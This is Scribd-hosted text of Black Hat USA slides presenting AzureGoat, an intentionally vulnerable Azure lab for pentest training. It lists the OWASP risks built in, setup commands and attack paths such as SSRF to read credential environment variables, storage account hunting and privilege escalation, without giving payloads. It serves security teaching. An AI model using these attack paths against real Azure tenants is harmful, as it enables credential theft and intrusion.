Scribd
Upload
437 views26 pages

Azure Goat

The document introduces AzureGoat, a vulnerable Azure infrastructure created to simulate real-world security issues for training purposes. AzureGoat includes a blog application module that incorporates several of the OWASP Top 10 risks, including broken access control, injection, insecure design, and more. It aims to provide a platform for learning how to pentest Azure configurations by including exploits for vulnerabilities like XSS, SQL injection, and privilege escalation. Future plans include expanding it with additional application modules across multiple tenants.

Uploaded by

subramanya sai B
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
437 views26 pages

Azure Goat

The document introduces AzureGoat, a vulnerable Azure infrastructure created to simulate real-world security issues for training purposes. AzureGoat includes a blog application module that incorporates several of the OWASP Top 10 risks, including broken access control, injection, insecure design, and more. It aims to provide a platform for learning how to pentest Azure configurations by including exploits for vulnerabilities like XSS, SQL injection, and privilege escalation. Future plans include expanding it with additional application modules across multiple tenants.

Uploaded by

subramanya sai B
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 26

AzureGoat : A Damn Vulnerable Azure Infrastructure

Jeswin Mathai, Nishant Sharma, Sherin Stephen, Rachana Umaraniya

#BHUSA @BlackHatEvents
About US
Jeswin Mathai
• Chief Architect, Lab Platform @ INE
• Published Research at Black Hat US/Asia Arsenal, DEF CON USA/China Demolabs
• Gave research talk at DEF CON China and Rootcon Philippines
• Co-Trainer in Training:
- Black Hat Asia
- HITB AMS, GSEC
- NZ OWASP day
- Rootcon 13

#BHUSA @BlackHatEvents
Information Classification: General
About US
Nishant Sharma
• Director, Lab Platform @ INE
• Firmware developer, Enterprise WiFi APs and WIPS Sensors, Mojo Networks (Acquired
by Arista Networks)
• Masters degree in Infosec
• Published research at Blackhat US/Asia, DEF CON USA/China, HITB Amsterdam and
other venues
• Conducted trainings in HITB, OWASP NZ day and for multiple private clients

#BHUSA @BlackHatEvents
Information Classification: General
About US
Sherin Stephen
• Cloud Developer @ INE
• Presented his work at BlackHat Asia Arsenal 2022
• Experienced in Building and maintaining reusable code and robust cloud services

Rachana Umaraniya
• Cloud Developer @ INE
• Master's Degree in Computer Science
• Two years of experience in software development and specializes in Java Frameworks

#BHUSA @BlackHatEvents
Information Classification: General
#BHUSA @BlackHatEvents
Information Classification: General
#BHUSA @BlackHatEvents
Information Classification: General
Threatscape

#BHUSA @BlackHatEvents
Information Classification: General
Threatscape

#BHUSA @BlackHatEvents
Information Classification: General
Motivation
• Training Needs

• Lack of Real World Azure Pentesting Environment

• Contribution from the open source community and security professionals

• Release of OWASP Top 10: 2021

#BHUSA @BlackHatEvents
Information Classification: General
Introducing AzureGoat

#BHUSA @BlackHatEvents
Information Classification: General
AzureGoat : A Damn Vulnerable Azure Infrastructure

• Mimics real-world infrastructure but with added vulnerabilities

• Multiple application stacks - Multiple exploitation/escalation paths

• Features OWASP Top 10: 2021

• Focused on Black-box approach

• Still in early stage


- Module 1 : Blog Application

#BHUSA @BlackHatEvents
Information Classification: General
OWASP Top 10

Image Reference: https://owasp.org/www-project-top-ten/

#BHUSA @BlackHatEvents
Information Classification: General
AzureGoat : Module 1 (Blog Application)
• A01: Broken Access Control

• A02: Cryptographic Failure

• A03: Injection

• A04: Insecure Design

• A05: Security Misconfiguration

• A07: Identification and Authentication Failures

• A10: Server Side Request Forgery

#BHUSA @BlackHatEvents
Information Classification: General
AzureGoat : Module 1 (Blog Application)

#BHUSA @BlackHatEvents
Information Classification: General
Building Realistic Insecure Application : Challenges

• Security Professional vs Seasoned Developers

• Mimicking Development Process

• Multiple Developer Environments

• Fast-paced development

• Lack of secure code practices

#BHUSA @BlackHatEvents
Information Classification: General
Project Family

#BHUSA @BlackHatEvents
Information Classification: General
Installation
• Repository: https://github.com/ine-labs/AzureGoat

• Requirements
- AZ Utility
- Terraform
- Python
- Git
• Commands
- az login
- git clone https://github.com/ine-labs/AzureGoat
- terraform init
- terraform apply

#BHUSA @BlackHatEvents
Information Classification: General
Installation

#BHUSA @BlackHatEvents
Information Classification: General
Attacking the Application
• Reflected XSS
• SQL Injection
• Insecure Direct Object Reference
• Server Side Request Forgery Click
Clickto
toadd
add
DALL-E
• Sensitive Data Exposure text
text
DALL-E

• Password Reset
• S3 Misconfiguration
• IAM Privilege Escalation

#BHUSA @BlackHatEvents
Information Classification: General
Exploitation

#BHUSA @BlackHatEvents
Information Classification: General
Server Side Request Forgery
• Reading the source code of the application

• Reading the environment variables


- Storage Account Credential StringsClick to add
- CosmosDB Credentials. Click DALL-E
to add
- Escalate Privileges text
text
DALL-E

• Enumerate other applications/instances in the network

#BHUSA @BlackHatEvents
Information Classification: General
Hunting Storage Accounts and Containers
• Globally unique

• Company-wide naming practices: Predictable names - based on departments/applications


Click
Clickto
toadd
add
DALL-E
• text DALL-E
text of information
Misconfigured Storage Account - plethora

#BHUSA @BlackHatEvents
Information Classification: General
Privilege Escalation

#BHUSA @BlackHatEvents
Information Classification: General
Future Plans: Multiple Applications across Multiple Tenants

Click DALL-E
to add
DALL-E
text

Image Reference: Architecting multitenant solutions on Azure


#BHUSA @BlackHatEvents
Information Classification: General
Future Plans
• More modules: Virtual Machine, Container Instances and AKS

• Multi Tenant infrastructure


Click
Clickto
toadd
add
DALL-E
• Working with the community text
text
DALL-E

• IaC Misconfigurations

• Secure coding/deployment practices

#BHUSA @BlackHatEvents
Information Classification: General
Thanks
Click
Clickto
toadd
add
DALL-E
text
text
DALL-E

[email protected]

#BHUSA @BlackHatEvents
Information Classification: General

You might also like